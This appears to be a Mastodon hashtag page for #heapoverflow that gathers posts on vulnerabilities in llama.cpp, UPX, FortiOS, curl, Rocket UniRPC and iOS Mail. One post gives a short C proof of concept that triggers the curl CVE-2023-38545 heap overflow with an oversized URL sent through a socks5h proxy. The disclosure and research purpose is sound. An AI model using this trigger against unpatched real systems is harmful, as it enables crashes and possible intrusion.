Fosstodon

0 posts0 participants0 posts today

Hacker NewsHeap-overflowing Llama.cpp to RCE<a href="https://retr0.blog/blog/llama-rpc-rce" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://retr0.blog/blog/llama-rpc-rce</a><a href="https://mastodon.social/tags/HackerNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HackerNews</a> <a href="https://mastodon.social/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HeapOverflow</a> <a href="https://mastodon.social/tags/LlamaCpp" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#LlamaCpp</a> <a href="https://mastodon.social/tags/RCE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#RCE</a> <a href="https://mastodon.social/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#CyberSecurity</a> <a href="https://mastodon.social/tags/Exploit" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Exploit</a> <a href="https://mastodon.social/tags/TechNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#TechNews</a>

LavX NewsUnraveling the Llama: A Deep Dive into Heap Exploitation in Llama.cppIn a thrilling exploration of Llama.cpp's unique memory management, Patrick Peng unearths a heap overflow vulnerability that leads to remote code execution. This article decodes the intricate exploita...<a href="https://news.lavx.hu/article/unraveling-the-llama-a-deep-dive-into-heap-exploitation-in-llama-cpp" rel="nofollow noopener noreferrer" target="_blank">https://news.lavx.hu/article/unraveling-the-llama-a-deep-dive-into-heap-exploitation-in-llama-cpp</a><a href="https://mastodon.cloud/tags/news" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#news</a> <a href="https://mastodon.cloud/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#tech</a> <a href="https://mastodon.cloud/tags/RemoteCodeExecution" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#RemoteCodeExecution</a> <a href="https://mastodon.cloud/tags/LlamaCpp" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#LlamaCpp</a> <a href="https://mastodon.cloud/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HeapOverflow</a>

🛡 H3lium@infosec.exchange/:~# :blinking_cursor:Heap Buffer Overflow in UPX IdentifiedDate: March 26, 2024 CVE: To be assigned Vulnerability Type: Buffer Errors CWE: [[CWE-122]] Sources: <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3209" rel="nofollow noopener noreferrer" target="_blank">NIST</a> <a href="https://vuldb.com/?ctiid.259055" rel="nofollow noopener noreferrer" target="_blank">VULNDB</a> <a href="https://vuldb.com/?submit.304575" rel="nofollow noopener noreferrer" target="_blank">VULNDB Submit</a>Issue SummaryA heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit <code>06b0de9c77551cd4e856d453e094d8a0b6ef0d6d</code>. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.Technical Key findingsThe vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.Vulnerable products<ul><li>[[UPX]] version identified by commit <code>06b0de9c77551cd4e856d453e094d8a0b6ef0d6d</code>.</li></ul>Impact assessmentAn attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.Patches or workaroundNo specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.Tags<a href="https://infosec.exchange/tags/UPX" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#UPX</a> <a href="https://infosec.exchange/tags/BufferOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#BufferOverflow</a> <a href="https://infosec.exchange/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HeapOverflow</a> <a href="https://infosec.exchange/tags/SecurityVulnerability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#SecurityVulnerability</a> <a href="https://infosec.exchange/tags/CVE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#CVE</a>

Harry SintonenHere’s a quick proof of concept to reproduce the <a href="https://infosec.exchange/tags/curl" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#curl</a> <a href="https://infosec.exchange/tags/CVE202338545" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#CVE202338545</a> <a href="https://infosec.exchange/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#heapoverflow</a> <a href="https://infosec.exchange/tags/vulnerability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#vulnerability</a>. This PoC expects localhost to run a <a href="https://infosec.exchange/tags/socks5" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#socks5</a> proxy:gcc -xc -fsanitize=address - -lcurl <<EOF # include <curl/curl.h> # include <string.h> int main(void) { CURL *curl = curl_easy_init(); if(curl) { char url[32768]; memcpy(url, "https://", 8); memset(url + 8, 'A', sizeof(url) - 8 - 1); url[sizeof(url) - 1] = '\0'; curl_easy_setopt(curl, CURLOPT_URL, url); (void)curl_easy_perform(curl); curl_easy_cleanup(curl); } return 0; } EOF https_proxy=socks5h://127.0.0.1 ./a.outSome comments: • Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app). • Application must either fetch the attacker provided URL or follow redirects controlled by the attacker. • Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation. • Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at <a href="https://curl.se/docs/CVE-2023-38545.html" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://curl.se/docs/CVE-2023-38545.html</a> for more details.<a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a>

Bishop FoxWe internally developed an <a href="https://infosec.exchange/tags/exploit" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#exploit</a> for <a href="https://infosec.exchange/tags/CVE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#CVE</a>-2023-27997, a <a href="https://infosec.exchange/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#heapoverflow</a> in <a href="https://infosec.exchange/tags/FortiOS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#FortiOS</a> (OS behind <a href="https://infosec.exchange/tags/FortiGate" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#FortiGate</a> firewalls) that allows <a href="https://infosec.exchange/tags/RCE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#RCE</a>. 490,000 affected SSL VPN interfaces are exposed online & about 69% of them are currently unpatched. Patch yours now. <a href="https://bfx.social/439HtF3" rel="nofollow noopener noreferrer" target="_blank">https://bfx.social/439HtF3</a>

Ron BowesJust published a big pile of <a href="https://infosec.exchange/tags/research" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#research</a> I did this past winter! Protocol <a href="https://infosec.exchange/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#reverseengineering</a>, <a href="https://infosec.exchange/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#heapoverflow</a>, <a href="https://infosec.exchange/tags/stackoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#stackoverflow</a>, <a href="https://infosec.exchange/tags/authbypass" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#authbypass</a> - lots of cool stuff. If you think this sounds cool, be sure to check out my <a href="https://infosec.exchange/tags/NorthSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#NorthSec</a> talk in May :)Here are some links:<ul><li>The blog post with all the details: <a href="https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed/" rel="nofollow noopener noreferrer" target="_blank">https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed/</a></li><li>Implementation of their protocol (with PoC scripts): <a href="https://github.com/rbowes-r7/libneptune" rel="nofollow noopener noreferrer" target="_blank">https://github.com/rbowes-r7/libneptune</a></li><li>Metasploit PR: <a href="https://github.com/rapid7/metasploit-framework/pull/17832" rel="nofollow noopener noreferrer" target="_blank">https://github.com/rapid7/metasploit-framework/pull/17832</a></li></ul>If you're running <a href="https://infosec.exchange/tags/RocketSoftware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#RocketSoftware</a>'s UniData or UniVerse suites, which are usually a back-end thing, you need to patch ASAP!

Astra Kernel :verified:For <a href="https://infosec.exchange/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HeapOverflow</a> it is not writing the vulnerable code 😲🤔<a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://infosec.exchange/tags/chatgpt" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#chatgpt</a> <a href="https://infosec.exchange/tags/openai" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#openai</a>

ITSEC NewsApple Patches Two iOS Zero-Days Abused for Years - Researchers revealed two zero-day security vulnerabilities affecting Apple's stock Mail app on iOS... more: <a href="https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/" rel="nofollow noopener noreferrer" target="_blank">https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/</a> <a href="https://schleuss.online/tags/vulnerabilities" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#vulnerabilities</a> <a href="https://schleuss.online/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#heapoverflow</a> <a href="https://schleuss.online/tags/ioszeroday" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ioszeroday</a> <a href="https://schleuss.online/tags/ios13" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ios13</a>.4.5 <a href="https://schleuss.online/tags/iphone" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#iphone</a> <a href="https://schleuss.online/tags/hacks" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#hacks</a> <a href="https://schleuss.online/tags/ipad" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ipad</a>

Recent searches

Search options

Administered by:

Server stats:

#heapoverflow